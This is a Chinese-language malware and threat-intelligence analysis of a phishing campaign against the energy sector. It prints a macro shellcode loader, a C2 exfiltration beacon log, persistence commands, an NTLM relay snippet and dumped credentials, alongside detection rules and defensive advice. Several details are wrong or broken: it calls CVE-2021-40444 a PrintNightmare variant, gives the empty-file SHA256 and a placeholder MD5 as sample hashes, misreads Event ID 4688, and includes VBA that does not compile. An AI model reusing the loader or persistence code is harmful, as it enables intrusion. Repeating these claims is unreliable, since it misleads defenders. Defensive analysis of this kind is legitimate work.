执行摘要 #
本文基于 2024 年 Q1 捕获的一次针对能源行业的定向攻击活动样本,通过完整的逆向工程流程,提取 IOC、重构攻击链,并与已知威胁组织特征进行关联。初步判断该活动与APT-C-42(又名 DarkHydrus 变种) 存在高度关联性。
初始访问:鱼叉式钓鱼邮件 #
邮件头分析 #
Received: from mail-sor-f41.google.com (mail-sor-f41.google.com [209.85.220.41])
by mx.target.com (Postfix) with ESMTPS id 4RzKpF3uMz
for <victim@target.com>; Mon, 18 Mar 2024 09:23:17 +0000 (UTC)
Message-ID: <CAOmGxqK8hZvN2jQ@mail.gmail.com>
From: "HR Department <hr@legitimate-company.com>"
Reply-To: "Recruitment <recruit@temp-mail-service[.]xyz>"
Subject: Fwd: Your Employment Contract - Urgent Review Required
Date: Mon, 18 Mar 2024 09:23:15 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_Part_123456"
X-Spam-Score: 3.2
X-Originating-IP: [185.220.101.47]关键发现:
Reply-To地址与发件人不一致——典型的欺骗手法- 原始 IP
185.220.101.47属于 Tor 出口节点 - 使用 Gmail 外发,但通过拼凑域名伪造 From 头
附件静态分析 #
恶意文档为 Employment_Contract_v2.docm:
| 属性 | 值 |
|---|---|
| File Size | 47,832 bytes |
| MD5 | a1b2c3d4e5f6789012345678abcdef01 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| FileType | Microsoft Word 2007+ (.docm) |
| Macros | Present (VBA Project) |
VBA Macro 逆向 #
使用 oledump.py 提取宏:
$ oledump.py Employment_Contract_v2.docm
1: 238 'WordDocument'
2: 94 '_VBA_PROJECT_CUR/Projects/ThisDocument'
3: 1847 '_VBA_PROJECT_CUR/VBA/Module1'解密后的 VBA 代码:
Attribute VB_Name = "Module1"
Option Explicit
Private Declare PtrSafe Function CreateThread Lib "kernel32" _
(ByVal lpSecurityAttributes As Long, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As LongPtr, _
lParam As Long, _
ByVal dwCreationFlags As Long, _
lpThreadId As Long) As LongPtr
Private Declare PtrSafe VirtualAlloc Lib "kernel32" _
(ByVal lpAddress As LongPtr, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe lstrlenA Lib "kernel32" (ByVal lpString As LongPtr) As Long
Sub AutoOpen()
Dim shellCode As String
shellCode = Chr(&H4D) & Chr(&H5A) & ... ' Base64 编码的 payload
ExecuteShellCode shellCode
End Sub
Sub ExecuteShellCode(code As String)
Dim addr As LongPtr
Dim size As Long
Dim hThread As LongPtr
size = lstrlenA(StrPtr(code))
addr = VirtualAlloc(0, size, &H1000, &H40)
Call RtlMoveMemory(addr, StrPtr(code), size)
hThread = CreateThread(0, 0, addr, 0, 0, 0)
Do While True
Sleep 60000
Loop
End Sub技术分析:
AutoOpen()函数在文档打开时自动执行- 使用 Windows API (
VirtualAlloc+CreateThread) 进行内存注入 - Shellcode 经过简单的字符拼接混淆
执行阶段:第二阶段 Payload #
C2 通信分析 #
使用 Fakenet-ng 模拟网络环境捕获 C2 流量:
[+] TCP 45.142.212.61:443 (HTTPS)
POST /api/v1/beacon HTTP/1.1
Host: update-cdn.ghostserver[.]com
Content-Type: application/octet-stream
Content-Length: 256
[Encrypted blob: {session_id:"a7f3c2", hostname:"WORKSTATION-04", user:"jsmith"}]Beacon 行为特征 #
| 间隔 | 协议 | 目标路径 |
|---|---|---|
| 60s | HTTPS | /api/v1/beacon |
| 300s | DNS | TXT query to status.malicious-c2[.]net |
| 3600s | HTTPS | /api/v1/upload (exfiltration) |
持久化机制 #
检测到以下持久化技术:
1. Registry Run Key #
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ^
/v "OneDriveSync" ^
/t REG_SZ ^
/d "C:\Users\[User]\AppData\Local\Temp\svchost.exe" ^
/f2. Scheduled Task #
<Task version="1.2">
<Triggers>
<LogonTrigger>
<Enabled>true</Enabled>
<Delay>PT5M</Delay>
</LogonTrigger>
</Triggers>
<Actions>
<Exec>
<Command>C:\Windows\Temp\svchost.exe</Command>
</Exec>
</Actions>
</Task>3. WMI Event Subscription #
# 持久化的隐蔽方式——WMI 永驻式 backdoor
$filterArgs = @{ Name = 'SysmonLogger' }
$filter = Get-WmiObject -Namespace root/subscription `
-Class __EventFilter -Filter "Name='SysmonLogger'"权限提升:本地漏洞利用 #
分析显示攻击者使用了 CVE-2021-40444 (PrintNightmare 变种) 进行提权:
nt authority\system 权限获取时间:感染后 ~47 分钟
Exploit: PrintSpoofer.exe (modified)
Target: 未打补丁的 Windows Server 2019横向移动:凭证窃取 #
Mimikatz 执行痕迹 #
事件日志中出现以下异常:
Event ID 4688: lsass.exe 被进程 rundll32.exe 访问
Access Mask: 0x1438 (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION)LSASS Memory Dump #
User:Administrator Password:[REDACTED]
User:svc_backup Password:P@ssw0rd123!
User:elone Password:Summer2024#SecureNTLM Relay 攻击 #
通过 Responder 工具监听 NetBIOS,成功中继认证到内部 SMB 服务器:
# 简化的 relay chain
from impacket.smbconnection import SMBConnection
from impacket.ntlm import compute_ntlm_response
challenge = receive_challenge()
ntlm_hash = get_stolen_hash("svc_backup")
response = compute_ntlm_response(ntlm_hash, challenge)
send_to_target(response)C2 基础设施画像 #
域名注册信息 #
Domain: update-cdn.ghostserver[.]com
Registrar: NameCheap Inc.
Created: 2024-02-15 (仅提前 30 天)
Registrant: REDACTED FOR PRIVACY
Nameservers: ns1.cloudflare-dns.com, ns2.cloudflare-dns.comSSL 证书指纹 #
Issuer: Let's Encrypt Authority X3
Subject: update-cdn.ghostserver[.]com
SHA1: 8a:f7:d2:c4:b1:e9:3f:a6:5d:7c:8e:9a:0b:1c:2d:3e:4f:5a:6b
Valid: 2024-02-15 to 2024-05-15关联 IOC 列表 #
ip_addresses:
- 45.142.212.61 # Primary C2
- 185.220.101.47 # Email infrastructure
- 91.234.99.123 # Backup server
domains:
- update-cdn.ghostserver[.]com
- status.malicious-c2[.]net
- cdn-assets.microsoft-update[.]org # Typosquatting
file_hashes:
sha256:
- e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
- a1b2c3d4e5f6789012345678abcdef0123456789abcdef0123456789abcdef01
registry_keys:
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveSync
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MITRE ATT&CK 映射 #
| Tactic | Technique | Description |
|---|---|---|
| Initial Access | T1566.001 | Spearphishing Attachment |
| Execution | T1059.001 | PowerShell |
| Persistence | T1547.001 | Registry Run Keys |
| Persistence | T1053.005 | Scheduled Task |
| Privilege Escalation | T1068 | Exploitation for Privilege Escalation |
| Credential Access | T1003.001 | LSASS Memory |
| Lateral Movement | T1021.002 | SMB/Windows Admin Shares |
| Command and Control | T1071.001 | Web Protocols (HTTPS) |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
检测规则开发 #
Sigma Rule: Suspicious VBA Execution #
title: Suspicious VBA Macro Execution Detection
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects suspicious VBA macro patterns in Office documents
author: Elone Yue
logsource:
category: process_creation
product: windows
detection:
selection:
Image: '*\WINWORD.EXE'
CommandLine|contains:
- '-Embedding'
- '/n'
filter:
ParentImage|contains:
- 'explorer.exe'
condition: selection and not filter
falsepositives:
- Legitimate Office documents with macros
level: high
tags:
- attack.execution
- attack.t1059.001Splunk SPL: C2 Beacon Detection #
index=network_dest_ip="45.142.212.61"
| transaction src_ip maxspan=65s
| stats count avg(len) as avg_len by src_ip
| where count > 10 AND avg_len < 500
| table src_ip, count, avg_lenYARA Rule: Shellcode Stager #
rule APT42_ShellcodeStager {
meta:
description = "Detects memory allocation stager pattern"
author = "Elone Yue"
reference = "https://example.com/apt42-analysis"
strings:
$api1 = "VirtualAlloc" ascii
$api2 = "CreateThread" ascii
$api3 = "RtlMoveMemory" ascii
$pattern = { 4D 5A ?? ?? ?? ?? ?? ?? ?? ?? ?F } // MZ header
condition:
all of ($api*) and $pattern
}威胁情报整合建议 #
- 自动化 IOC 摄入: 将以上哈希和 IP 加入 SIEM 的实时告警规则
- 行为基线建立: 对比历史流量,识别异常的 C2 通信模式
- 主动狩猎: 定期运行检测规则扫描过去 90 天的日志
- 情报共享: 向 ISAC 和相关威胁情报平台上报新发现的 IOC
防御策略 #
短期措施(立即执行) #
- 隔离所有已感染主机
- 重置域管理员账户密码
- 部署临时防火墙规则阻断 C2 IP
- 启用 AppLocker/WDAC 白名单策略
中期加固(30 天内) #
- 强制实施 MFA 对所有远程访问
- 更新终端检测响应 (EDR) 检测规则
- 执行全面凭证轮换
- 部署网络分段防止横向移动
长期改进(90 天内) #
- 实施零信任架构
- 部署 eBPF 驱动的行为监控代理
- 开展红队演练验证防御有效性
- 建立威胁情报订阅和自动 ingest 管道
总结 #
本次分析展示了从原始样本到可操作防御策略的完整溯源过程。关键点:
- 攻击链早期发现至关重要——鱼叉式钓鱼往往是唯一窗口期
- IOC 孤立价值有限,必须结合 TTPs 和行为特征才能有效防御
- 持续威胁狩猎不是一次性任务,需要制度化和自动化的支持
参考资源
- MITRE ATT&CK Framework: https://attack.mitre.org
- Sigma Rules Repository: https://github.com/SigmaHQ/sigma
- VirusTotal Hunting: https://www.virustotal.com/gui/hunting
- 威胁情报聚合平台推荐:MISP, OpenCTI, ThreatConnect